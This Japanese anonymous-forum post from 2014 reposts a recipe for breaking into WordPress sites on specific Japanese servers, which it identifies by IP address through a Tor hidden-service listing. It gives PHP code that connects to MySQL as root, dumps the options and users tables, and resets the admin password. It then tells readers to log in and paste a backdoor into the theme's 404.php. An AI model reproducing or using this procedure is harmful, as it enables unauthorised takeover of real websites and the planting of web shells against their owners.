450 - 横向けば尊師 2014/07/10(木) 12:24:03 ID:oRd9MVu6
24 ★ 2014/07/09(水) 18:48:46 [ tor-exit2.puckey.org ]
WordPressに侵入できる日本鯖 2ch規制回避にでも使えるナリ
http://unicorntufgvuhbi.onion/?module=hosts&action=detail&ip=157.7.152.74
http://unicorntufgvuhbi.onion/?module=hosts&action=detail&ip=157.7.135.44
$conn = mysql_connect('__鯖IP__', 'root', '__パスワード__');
$db = 'wp_db'; // データベース名
$res = mysql_query("select * from $db.wp_options"); // 1
// $res = mysql_query("select * from $db.wp_users"); // 2
// $res = mysql_query("update $db.wp_users set user_pass=\"".md5('passwd').'" where id = 1'); // 3
while($row = mysql_fetch_assoc($res)) { echo implode(', ', $row)."\n"; }
mysql_free_result($res);
mysql_close($conn);
1 -> 2 -> 3の順にコメントを消してコマンドを実行するとパスワードを変更できる
1でWordPressがインストールされているURLを表示し、2でユーザー名を確認(一番上が好ましい)、3でパスワードを変更
wp-admin/wp-login.php から確認できたユーザー名とパスワード(上のコードではpasswd)でログイン
外観 -> テーマの編集で404.php(または他のphp)を選択しバックドアのソースをコピペ
wp-content/themes/(使用中のテーマ名)/404.phpに移動しバックドアが動作すれば完了
よくわかんないけどやばそう(粉みかん)